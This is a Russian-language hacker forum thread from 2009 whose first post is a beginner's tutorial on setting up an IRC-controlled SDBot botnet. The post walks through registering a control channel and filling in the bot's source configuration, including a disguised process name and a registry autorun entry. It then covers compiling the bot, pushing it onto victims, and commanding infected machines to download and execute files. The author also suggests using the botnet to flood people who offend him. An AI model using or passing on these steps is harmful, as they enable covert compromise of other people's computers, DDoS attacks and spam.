Перейти к содержимому

Фотография

Ботнет - Страшный зверь

- - - - -

  • Авторизуйтесь для ответа в теме

#1
eXISten

Отправлено 16 ������ 2009 - 04:43

eXISten

    Настороже )))

  • VIP
  • 118 сообщений
Приветсвую всех хакеров,крэкэров,кодеров и новичков!С вами снова я - eXISten.Ну вот я опять пишу сатью,и в этот раз на одну очень интерестную тему.Всё меньше и меньше я стал видеть в инете сатей о таких монстрах как БОТНЕТ.Я думаю все мы знаем что это такое,ну а те кто не знают что это,то не надо расстраиватся!Я сегодня вам раскажу не только что это такое,но и как это всё организовать!Давайте наконец приступим к изучению.
И так,вы наверное все спрашивавете,а что же такое ботнет,и что такое бот?Я вам прямо сейчас и дам ответы на все эти вопросы:

1-"Бот-компьютер" - это компьютер, на котором установлена бот-программа,при помощи которой "хозяин" может управлять этим компьютером. Боты применяются чаще в хакерских целях.

2-Сама "бот программа" - это программа,которая выполняет какое-то определённое действия автоматически для которого она спрограммированна,и которой в большинстве случаев,управляет её "хозяин".Боты могут быть разными,бывают ICQ боты,бывают боты которые предназначенны для спама сайтов,боты которые сидят на сайтах,чатах,автоматически отравляя сообщения или отвечая на них...Но в этой статье пойдёт речь совсем о других ботах,о которых будет описано чуть ниже.

3-Ботнет - это некоторое количество компьютеров зараженных специальным трояном, (в нашем случае это будет бот) который объединяет этот компьютер и остальные зараженные компьютеры в одну единую сеть,которой управляет "хозяин".Другими словами,ботнет это зараженная сеть компьютеров,которая подчиняется "хозяину".

Зараженный компьютер,бот-программа превращает в так называемый "Компьютер зомби" который подчиняется своему "хозяину".Ботнеты (сеть компьютерав зараженных ботами) чаще всего используются хакерами для рассылки спама с этих зараженных компов,так же их используют в качестве прокси,при этом хакер остаётся незамеченным совершая взломы,или же для DDos атак,что заключается в посылке множество пакетов разной информации на атакуемый сервер с зараженных компьютеров,что приводит к тому что атакуемый сервер тратит все свои материалы на обработку этих запросов,а на запросы обычных пользователей уже ответить не может,и сервер виснет.Но для этого нужна уже большая сеть зараженных компьютеров.

Многие боты используют так называемую технологиию "stealth" ,которая позволяет боту быть полностью невидимым в системе,и сидеть там так тихо,что пользователь даже не будет и подозревать что в его системе находиться бот.Некоторые боты-черви используют технологию самораспространения.Используя нашумевшие дыры в винде,боты могут сами распространяться по сети,заражая ежедневно сотни и тысячи компьютеров,обычно такие боты пишутся под заказ и стоят очень много денег.Но не все так плохо как кажется.Существует множество публичных ботов которые может скачать любой желающий и создать свою бот-сеть.

Владея большой сетью ботнетов,мы уже имеем преимущество,и можем смотеть на многих "с высока".Вдруг нас кто то обидел на сайте или форуме,тогда мы можем спокойно его например зафлудить.Так-что,имея такую армию,мы уже можем многое.
Заинтересовало?Тогда едем дальше!

Ботнетом можно управлять 3 способами: HTTP,IRC и MAIL.На сегодняшний день,самые популярные способы это IRC и HTTP.В этой статье я расскажу вам как завести свою бот-сеть,которая будет управляться через IRC канал.( Тем кто незнают что это такое могут ознакомится с этим здесь http://www.cqham.ru/ircinfo.htm ).

Бот который мы сегодня будем использовать для создания ботнета,это будет SD-Bot,наш бот,от русского издателя.Это самый простой и нормальный бот,поддеривающий такие функции как DoS,Администрирование IRC-канала...А теперь маленькое продставление о том как это всё будет действовать:

-Мы Берём IRC клиент,подключаемся к любому IRC сервверу,например irc.dalnet.ru,регестрируем там себе IRC канал на котором будут отчитыватся боты.Далее берём исходники бота,настраеваем их под себя,указывая к какому серверу и каналу должны будут подключатся боты,компилируем исходники в exe с помощью компилятора.Когда бот готов,мы его кому-нибудь впариваем,жертва запускает бота,и после запуска этот бот скрыто от пользователя заходит на указанный ему IRC-канал,и сидит там,а мы потом заходим на этот канал,и отдаём команды боту,тем самым управляя зараженным компютером.Так же он прописывает себя в автозапуск (а точнее ключ в реестер).

-Ну о том как будет действовать бот мы уже разобрались.А теперь давайте откроем банку пива и врубим хороший музон,разберём всё это в подробностях и научмися создавать свой ботнет! ;-)
И так,приступим дамы и господа:

ЭТАП ПЕРВЫЙ - СОЗДАНИЕ КАНАЛА.

-Как уже упоменалось чуть выше,ботами мы будем управлять через IRC-канал,для этого мы сейчас будем регестрировать канал для ботов.Берём IRC-клиент,(подойдёт mIRC) устанавливаем,запускаем,заполняем всё что нас просят (Ник,Имя и т.д...)и жмём ОК.Далее жмём в программе File - Select Server.Нажимаем Add вписываем нужный нам IRC-сервер (пускай это будет irc.dalnet.ru) и всё остальное,жмём ОК,потом мы видим что в списке серверов появился наш добавленный,кликаем по нему 2 раза,и жмём ОК.Всё,мы выбрали к какому серверу будем подключатся,теперь подключаемся,(Это можно сделать нажимая File - Connect,или нажав на значёк молнии на тулбаре в программе.)Ну вот мы подключились к серверу,и нам сначало нужно зарегестрировать свой ник на этом сервере(Помните что все команды IRC начинаются с символа " / ").Делаем это следующий командой:

/msg NickServ REGISTER желаемый_пароль ваш_email

Допустим что мы хотим зарегистрировать наш ник с паролем haker и email-ом [email protected].(Ник указывать не надо,так как вы его уже указали в программе при её запуске) Тогда эта команда будет выглядеть вот так:

/msg NickServ REGISTER haker [email protected]

Наверняка вам вышлют письмо на указзаный е-мейл для подтерждения регистрации ника.И так,ник зарегестрирован,теперь переходим к следующему этапу - регистрацию IRC канала для наших ботов.Сначала давайте подберём подходящее название канала ( Напоминаю,все названия каналов начинаются с символа решетки " # " ).Давайте назовём его #sdbot.И так,для того чтоб зарегистрировать наш канал #sdbot нам сначало нужно на него зайти.Делаем это следующий командой:

/join #sdbot

Этим мы указали что хотим подключится к каналу #sdbot.ОК,вводим предыдущую команду и жмём ENTER.И мы попадаем на наш ещё несуществующий канал,где мы видим что в списке тех кто подключён к каналу перед нашим ником стоит символ @.Это означает то что админы на этом канале МЫ.И так,теперь давайте регестрировать канал.В окошке НАШЕГО канала вписываем следующую команду:

/msg ChanServ register #канал пароль_на_канал описание_канала

Для того чтобы зарегисрировать наш канал с названием #sdbot,паролем haker,и описанием "просто_канал",то команда будет выглядеть так:

/msg ChanServ REGISTER #sdbot haker просто_канал

Вводим предыдущую команду и жмём ENTER.И всё!После этого ваш канал будет зарегестрирован!На этом первый этап законьчен,и мы с вами можем открыть ещё одну банку пива,сделать музон ещё громче,и смело переходить к следующему этапу. ;-)

ЭТАП ВТОРОЙ - НАСТРОЙКА И КОМПИЛЯЦИЯ БОТА.

Ну вот, мы подходим к самому интерестному моменту.Канал у нас есть,теперь нужны исходники бота.Скачать SDBot-a вы сможете с сайта нашей группы http://unlock-team.ucoz.ru/ в разделе "Софт и Видео".Ещё вам будет необходим компилятор для компиляции бота,для этого дела нужен будет LCC компилятор,скачать вы его сможете тоже с нашего сайта в том же разделе.И так,качаем всё нужное,устанавливаем компилятор,и распаковываем всё содержимое из архива с ботом в папку на рабочий стол (можно конечно и в другое место,но так удобней).
Далее,в папки с ботом лежит такой файл - sdbot05a.cpp,это и есть его исходники,и нам надо их настроить под себя,для этого открываем этот файл текстовым редактором,и ищем там в начале файла следующии строки и настраеваем их под себя (После символа коментария " // " я буду пояснять что надо вписывать):

// bot configuration
const char botid[] = "set_me"; // ID бота,можно вписать что угодно.
const char password[] = "set_me"; // пароль на бота
const int maxlogins = 4; // Оставляем как есть
const char server[] = "set_me"; // сервер к которому будет подключатся бот
const int port = 6667; // Оставляем как ессть
const char server2[] = ""; // Необязательно указыввать,это на тот случай если первый сервер будет недоступным,то бот подключится к второму.
const int port2 = 6667; // Оставояем как есть
const char serverpass[] = ""; // Тут тоже оставляем как и есть
const char channel[] = "set_me"; // Канал кудаботы будут подключатся
const char chanpass[] = ""; // Пароль канала (Только на тот случай если вы поставили пароль для доступак каналу)
const BOOL topiccmd = FALSE; // Оставляем как есть
const BOOL rndfilename = FALSE; // Оставляем как есть
const char filename[] = "cnfgld32.exe"; // Названия файла которое будет отобраэатся в процесах
const BOOL regrun = TRUE; // Оставляем как есть
const BOOL regrunservices = TRUE; // Оставляем как есть
const char valuename[] = "Configuration Loader"; // Названия ключа в реестере
const char prefix = '.'; // префикс названия ботов (только один символ)
const char version[] = "sdbot v0.5a by [sd]"; // Метка бота
const int cryptkey = 0; // Оставляем как есть
const int maxaliases = 16; // Оставляем как есть

Ну вот,вписываем вместо слова set_me нужный нам параметр,и сохраняем изменения (Файл - Сохранить).
Вот и всё,бот настроен.Теперь нужно его скомпилировать.Компилятор установлен?Тогда приступим к компиляции.

Для того чтобы скомпилировать его,на этот разва не придётся это делать из командной строки.Всё гораздо проще.В папки с ботом,лежит батник,(Batch файл) Если в него нужно внести изменеия то делаем это.Потом запускаем этот батник,и еси всё правильно сделано,то в папки с исходниками появится exe файл,это и будет наш бот.

Ну вот теперь всё готово для нашей дальнееший атаки.Теперь можно про банку с пивом забыть бообще,и переходить к третьему этапу,так как всё интерестное будет там. ;-)

ЭТАП ТРЕТИЙ - ЗАПУСК И КОНТРОЛЬ НАД БОТАМИ.

А вот теперь братцы хакеры и новички,самый интерестный момент!Использования бота!Приступим:
И так у нас всё готово для нашей атаки,канал и бот есть.Впариваем кому нибудь бота,или сначало протестируем на себе,неважно,главное чтобы его сейчас запустили.Ну так вот,идём на сервер на котором зарегистрирован канал,и коннектимся к каналу.
Далее запускаем наш бот...И что мы видим!На наш канал зашел бот,которого мы только что запустили!Ура!Цель достигнута.

Теперь самый момент вспомнить про пиво,и наслаждаться управляя ботом. ;-)
Мы можем отдавать команды боту,которые мы хотим чтоб он выполнил на зараженном компе.Давайте дадим ему команду:

.about

И в ответ мы видим:

: sdbot version 0.4c by [sd] ([email protected]). homepage:
sdbot.n3.net/

Как мы видим,бот послушно выполнил нашу команду - показать инфу о создателе бота.
Вот некоторые другие каманды:

cycle : уйти на несколько секунд с канала, а потом опять зайти.
die : Боты убивают сами себя.Так сказать самоубийство
execute [parameters] : запустить файл на компьютере жертвы
download : скачать файл на зараженный комп.
ping <# of pings> - ПИНГ - Без комантариев))

Это самые основные команды,остальные команды вы сможете найти в HTML файле которыйв архиве с ботом.
Ну вот и всё,согласись,всё очень просто.Но правда иногда сталкеваешься с проблемами,вот например как я - У меня боты почему-то не заходили на канал,сколько я не пробовал,не как.Но после долгих мучений я достиг результата.Просто тут нужно иметь много терпения и желания это всёделать.

Ну вот и подошла к концу моя статья.Надеюсь она вам оказалось полезной,или познавательной.Читайте,изучайе,и пробуйте,и помните,главное иметь терпение и желания.

Данная статья написана только для ознакомительных целей,и за использования этой статьи в плохих целях,я не отвечаю.

С вами был eXISten,спасибо за внимание,и как всегда желаю вам удачи!

#2
yung3r

Отправлено 14 ���� 2009 - 08:19

yung3r

    Новоприбывший

  • Пользователи
  • 6 сообщений
Спасибо за инфо Я ето и так знаю но комусь будет интересно !!

#3
yung3r

Отправлено 14 ���� 2009 - 08:31

yung3r

    Новоприбывший

  • Пользователи
  • 6 сообщений
Респкт ))

#4
Guest_redbu11_*

Отправлено 01 ������� 2009 - 06:27

Guest_redbu11_*
  • Гости
Что пацаньчик плагиатом занимаешься?Автор этой статьи я,какого х*я ты подменил ник в статье?Хоть бы указал источник.
Ссылка на оригинал написанный мной http://hackzona.ru/h...i...le&sid=9384
ЛОЛ учись сам писать.